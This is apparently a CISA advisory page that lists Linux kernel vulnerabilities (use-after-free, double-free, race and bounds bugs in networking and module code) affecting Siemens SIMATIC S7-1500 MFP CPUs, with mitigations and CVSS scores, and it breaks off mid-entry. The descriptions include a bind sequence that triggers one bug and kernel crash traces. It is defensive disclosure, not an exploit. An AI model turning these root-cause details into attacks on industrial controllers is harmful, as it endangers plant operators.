<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31503</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: udp: Fix wildcard bind conflict check when using hash2 When binding a udp_sock to a local address and port, UDP uses two hashes (udptable-&gt;hash and udptable-&gt;hash2) for collision detection. The current code switches to "hash2" when hslot-&gt;count &gt; 10. "hash2" is keyed by local address and local port. "hash" is keyed by local port only. The issue can be shown in the following bind sequence (pseudo code): bind(fd1, "[fd00::1]:8888") bind(fd2, "[fd00::2]:8888") bind(fd3, "[fd00::3]:8888") bind(fd4, "[fd00::4]:8888") bind(fd5, "[fd00::5]:8888") bind(fd6, "[fd00::6]:8888") bind(fd7, "[fd00::7]:8888") bind(fd8, "[fd00::8]:8888") bind(fd9, "[fd00::9]:8888") bind(fd10, "[fd00::10]:8888") /* Correctly return -EADDRINUSE because "hash" is used * instead of "hash2". udp_lib_lport_inuse() detects the * conflict. */ bind(fail_fd, "[::]:8888") /* After one more socket is bound to "[fd00::11]:8888", * hslot-&gt;count exceeds 10 and "hash2" is used instead. */ bind(fd11, "[fd00::11]:8888") bind(fail_fd, "[::]:8888") /* succeeds unexpectedly */ The same issue applies to the IPv4 wildcard address "0.0.0.0" and the IPv4-mapped wildcard address "::ffff:0.0.0.0". For example, if there are existing sockets bound to "192.168.1.[1-11]:8888", then binding "0.0.0.0:8888" or "[::ffff:0.0.0.0]:8888" can also miss the conflict when hslot-&gt;count &gt; 10. TCP inet_csk_get_port() already has the correct check in inet_use_bhash2_on_bind(). Rename it to inet_use_hash2_on_bind() and move it to inet_hashtables.h so udp.c can reuse it in this fix.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31503">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31504</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: fix fanout UAF in packet_release() via NETDEV_UP race `packet_release()` has a race window where `NETDEV_UP` can re-register a socket into a fanout group's `arr[]` array. The re-registration is not cleaned up by `fanout_release()`, leaving a dangling pointer in the fanout array. `packet_release()` does NOT zero `po-&gt;num` in its `bind_lock` section. After releasing `bind_lock`, `po-&gt;num` is still non-zero and `po-&gt;ifindex` still matches the bound device. A concurrent `packet_notifier(NETDEV_UP)` that already found the socket in `sklist` can re-register the hook. For fanout sockets, this re-registration calls `__fanout_link(sk, po)` which adds the socket back into `f-&gt;arr[]` and increments `f-&gt;num_members`, but does NOT increment `f-&gt;sk_ref`. The fix sets `po-&gt;num` to zero in `packet_release` while `bind_lock` is held to prevent NETDEV_UP from linking, preventing the race window. This bug was found following an additional audit with Claude Code based on CVE-2025-38617.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31504">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31507</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/smc: fix double-free of smc_spd_priv when tee() duplicates splice pipe buffer smc_rx_splice() allocates one smc_spd_priv per pipe_buffer and stores the pointer in pipe_buffer.private. The pipe_buf_operations for these buffers used .get = generic_pipe_buf_get, which only increments the page reference count when tee(2) duplicates a pipe buffer. The smc_spd_priv pointer itself was not handled, so after tee() both the original and the cloned pipe_buffer share the same smc_spd_priv *. When both pipes are subsequently released, smc_rx_pipe_buf_release() is called twice against the same object: 1st call: kfree(priv) sock_put(sk) smc_rx_update_cons() [correct] 2nd call: kfree(priv) sock_put(sk) smc_rx_update_cons() [UAF] KASAN reports a slab-use-after-free in smc_rx_pipe_buf_release(), which then escalates to a NULL-pointer dereference and kernel panic via smc_rx_update_consumer() when it chases the freed priv-&gt;smc pointer: BUG: KASAN: slab-use-after-free in smc_rx_pipe_buf_release+0x78/0x2a0 Read of size 8 at addr ffff888004a45740 by task smc_splice_tee_/74 Call Trace: dump_stack_lvl+0x53/0x70 print_report+0xce/0x650 kasan_report+0xc6/0x100 smc_rx_pipe_buf_release+0x78/0x2a0 free_pipe_info+0xd4/0x130 pipe_release+0x142/0x160 __fput+0x1c6/0x490 __x64_sys_close+0x4f/0x90 do_syscall_64+0xa6/0x1a0 entry_SYSCALL_64_after_hwframe+0x77/0x7f BUG: kernel NULL pointer dereference, address: 0000000000000020 RIP: 0010:smc_rx_update_consumer+0x8d/0x350 Call Trace: smc_rx_pipe_buf_release+0x121/0x2a0 free_pipe_info+0xd4/0x130 pipe_release+0x142/0x160 __fput+0x1c6/0x490 __x64_sys_close+0x4f/0x90 do_syscall_64+0xa6/0x1a0 entry_SYSCALL_64_after_hwframe+0x77/0x7f Kernel panic - not syncing: Fatal exception Beyond the memory-safety problem, duplicating an SMC splice buffer is semantically questionable: smc_rx_update_cons() would advance the consumer cursor twice for the same data, corrupting receive-window accounting. A refcount on smc_spd_priv could fix the double-free, but the cursor-accounting issue would still need to be addressed separately. The .get callback is invoked by both tee(2) and splice_pipe_to_pipe() for partial transfers; both will now return -EFAULT. Users who need to duplicate SMC socket data must use a copy-based read path.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31507">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31508</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: openvswitch: Avoid releasing netdev before teardown completes The patch cited in the Fixes tag below changed the teardown code for OVS ports to no longer unconditionally take the RTNL. After this change, the netdev_destroy() callback can proceed immediately to the call_rcu() invocation if the IFF_OVS_DATAPATH flag is already cleared on the netdev. The ovs_netdev_detach_dev() function clears the flag before completing the unregistration, and if it gets preempted after clearing the flag (as can happen on an -rt kernel), netdev_destroy() can complete and the device can be freed before the unregistration completes. This leads to a splat like: [ 998.393867] Oops: general protection fault, probably for non-canonical address 0xff00000001000239: 0000 [#1] SMP PTI [ 998.393877] CPU: 42 UID: 0 PID: 55177 Comm: ip Kdump: loaded Not tainted 6.12.0-211.1.1.el10_2.x86_64+rt #1 PREEMPT_RT [ 998.393886] Hardware name: Dell Inc. PowerEdge R740/0JMK61, BIOS 2.24.0 03/27/2025 [ 998.393889] RIP: 0010:dev_set_promiscuity+0x8d/0xa0 [ 998.393901] Code: 00 00 75 d8 48 8b 53 08 48 83 ba b0 02 00 00 00 75 ca 48 83 c4 08 5b c3 cc cc cc cc 48 83 bf 48 09 00 00 00 75 91 48 8b 47 08 &lt;48&gt; 83 b8 b0 02 00 00 00 74 97 eb 81 0f 1f 80 00 00 00 00 90 90 90 [ 998.393906] RSP: 0018:ffffce5864a5f6a0 EFLAGS: 00010246 [ 998.393912] RAX: ff00000000ffff89 RBX: ffff894d0adf5a05 RCX: 0000000000000000 [ 998.393917] RDX: 0000000000000000 RSI: 00000000ffffffff RDI: ffff894d0adf5a05 [ 998.393921] RBP: ffff894d19252000 R08: ffff894d19252000 R09: 0000000000000000 [ 998.393924] R10: ffff894d19252000 R11: ffff894d192521b8 R12: 0000000000000006 [ 998.393927] R13: ffffce5864a5f738 R14: 00000000ffffffe2 R15: 0000000000000000 [ 998.393931] FS: 00007fad61971800(0000) GS:ffff894cc0140000(0000) knlGS:0000000000000000 [ 998.393936] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 998.393940] CR2: 000055df0a2a6e40 CR3: 000000011c7fe003 CR4: 00000000007726f0 [ 998.393944] PKRU: 55555554 [ 998.393946] Call Trace: [ 998.393949] [ 998.393952] ? show_trace_log_lvl+0x1b0/0x2f0 [ 998.393961] ? show_trace_log_lvl+0x1b0/0x2f0 [ 998.393975] ? dp_device_event+0x41/0x80 [openvswitch] [ 998.394009] ? __die_body.cold+0x8/0x12 [ 998.394016] ? die_addr+0x3c/0x60 [ 998.394027] ? exc_general_protection+0x16d/0x390 [ 998.394042] ? asm_exc_general_protection+0x26/0x30 [ 998.394058] ? dev_set_promiscuity+0x8d/0xa0 [ 998.394066] ? ovs_netdev_detach_dev+0x3a/0x80 [openvswitch] [ 998.394092] dp_device_event+0x41/0x80 [openvswitch] [ 998.394102] notifier_call_chain+0x5a/0xd0 [ 998.394106] unregister_netdevice_many_notify+0x51b/0xa60 [ 998.394110] rtnl_dellink+0x169/0x3e0 [ 998.394121] ? rt_mutex_slowlock.constprop.0+0x95/0xd0 [ 998.394125] rtnetlink_rcv_msg+0x142/0x3f0 [ 998.394128] ? avc_has_perm_noaudit+0x69/0xf0 [ 998.394130] ? __pfx_rtnetlink_rcv_msg+0x10/0x10 [ 998.394132] netlink_rcv_skb+0x50/0x100 [ 998.394138] netlink_unicast+0x292/0x3f0 [ 998.394141] netlink_sendmsg+0x21b/0x470 [ 998.394145] ____sys_sendmsg+0x39d/0x3d0 [ 998.394149] ___sys_sendmsg+0x9a/0xe0 [ 998.394156] __sys_sendmsg+0x7a/0xd0 [ 998.394160] do_syscall_64+0x7f/0x170 [ 998.394162] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ 998.394165] RIP: 0033:0x7fad61bf4724 [ 998.394188] Code: 89 02 b8 ff ff ff ff eb bb 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 80 3d c5 e9 0c 00 00 74 13 b8 2e 00 00 00 0f 05 &lt;48&gt; 3d 00 f0 ff ff 77 54 c3 0f 1f 00 48 83 ec 28 89 54 24 1c 48 89 [ 998.394189] RSP: 002b:00007ffd7e2f7cb8 EFLAGS: 00000202 ORIG_RAX: 000000000000002e [ 998.394191] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fad61bf4724 [ 998.394193] RDX: 0000000000000000 RSI: 00007ffd7e2f7d20 RDI: 0000000000000003 [ 998.394194] RBP: 00007ffd7e2f7d90 R08: 0000000000000010 R09: 000000000000003f [ 998.394195] R10: 000055df11558010 R11: 0000000000000202 R12: 00007ffd7e2 ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31508">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31515</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: af_key: validate families in pfkey_send_migrate() syzbot was able to trigger a crash in skb_put() [1] Issue is that pfkey_send_migrate() does not check old/new families, and that set_ipsecrequest() @family argument was truncated, thus possibly overfilling the skb. Validate families early, do not wait set_ipsecrequest(). [1] skbuff: skb_over_panic: text:ffffffff8a752120 len:392 put:16 head:ffff88802a4ad040 data:ffff88802a4ad040 tail:0x188 end:0x180 dev: kernel BUG at net/core/skbuff.c:214 ! Call Trace: skb_over_panic net/core/skbuff.c:219 [inline] skb_put+0x159/0x210 net/core/skbuff.c:2655 skb_put_zero include/linux/skbuff.h:2788 [inline] set_ipsecrequest net/key/af_key.c:3532 [inline] pfkey_send_migrate+0x1270/0x2e50 net/key/af_key.c:3636 km_migrate+0x155/0x260 net/xfrm/xfrm_state.c:2848 xfrm_migrate+0x2140/0x2450 net/xfrm/xfrm_policy.c:4705 xfrm_do_migrate+0x8ff/0xaa0 net/xfrm/xfrm_user.c:3150</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31515">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/131.html">CWE-131 Incorrect Calculation of Buffer Size</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31518</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: esp: fix skb leak with espintcp and async crypto When the TX queue for espintcp is full, esp_output_tail_tcp will return an error and not free the skb, because with synchronous crypto, the common xfrm output code will drop the packet for us. With async crypto (esp_output_done), we need to drop the skb when esp_output_tail_tcp returns an error.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31518">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/772.html">CWE-772 Missing Release of Resource after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31521</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: module: Fix kernel panic when a symbol st_shndx is out of bounds The module loader doesn't check for bounds of the ELF section index in simplify_symbols(): for (i = 1; i &lt; symsec-&gt;sh_size / sizeof(Elf_Sym); i++) { const char *name = info-&gt;strtab + sym[i].st_name; switch (sym[i].st_shndx) { case SHN_COMMON: [...] default: /* Divert to percpu allocation if a percpu var. */ if (sym[i].st_shndx == info-&gt;index.pcpu) secbase = (unsigned long)mod_percpu(mod); else /** HERE --&gt; **/ secbase = info-&gt;sechdrs[sym[i].st_shndx].sh_addr; sym[i].st_value += secbase; break; } } A symbol with an out-of-bounds st_shndx value, for example 0xffff (known as SHN_XINDEX or SHN_HIRESERVE), may cause a kernel panic: BUG: unable to handle page fault for address: ... RIP: 0010:simplify_symbols+0x2b2/0x480 ... Kernel panic - not syncing: Fatal exception This can happen when module ELF is legitimately using SHN_XINDEX or when it is corrupted. Add a bounds check in simplify_symbols() to validate that st_shndx is within the valid range before using it. This issue was discovered due to a bug in llvm-objcopy, see relevant discussion for details [1]. [1] https://lore.kernel.org/linux-modules/20251224005752.201911-1-ihor.solodrai@linux.dev/</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31521">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1285.html">CWE-1285 Improper Validation of Specified Index, Position, or Offset in Input</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-31533</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/tls: fix use-after-free in -EBUSY error path of tls_do_encryption The -EBUSY handling in tls_do_encryption(), introduced by commit 859054147318 ("net: tls: handle backlogging of crypto requests"), has a use-after-free due to double cleanup of encrypt_pending and the scatterlist entry. When crypto_aead_encrypt() returns -EBUSY, the request is enqueued to the cryptd backlog and the async callback tls_encrypt_done() will be invoked upon completion. That callback unconditionally restores the scatterlist entry (sge-&gt;offset, sge-&gt;length) and decrements ctx-&gt;encrypt_pending. However, if tls_encrypt_async_wait() returns an error, the synchronous error path in tls_do_encryption() performs the same cleanup again, double-decrementing encrypt_pending and double-restoring the scatterlist. The double-decrement corrupts the encrypt_pending sentinel (initialized to 1), making tls_encrypt_async_wait() permanently skip the wait for pending async callbacks. A subsequent sendmsg can then free the tls_rec via bpf_exec_tx_verdict() while a cryptd callback is still pending, resulting in a use-after-free when the callback fires on the freed record. Fix this by skipping the synchronous cleanup when the -EBUSY async wait returns an error, since the callback has already handled encrypt_pending and sge restoration.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-31533">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
